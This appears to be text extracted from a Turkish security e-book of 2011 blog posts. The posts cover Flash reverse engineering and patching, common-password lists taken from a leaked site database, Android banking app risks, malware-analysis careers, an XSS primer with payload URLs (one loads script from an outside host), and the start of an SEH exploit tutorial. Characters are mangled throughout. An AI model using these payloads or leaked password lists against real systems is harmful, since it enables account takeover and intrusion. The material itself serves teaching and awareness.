bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 17: Hack 4 Career - 2011

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

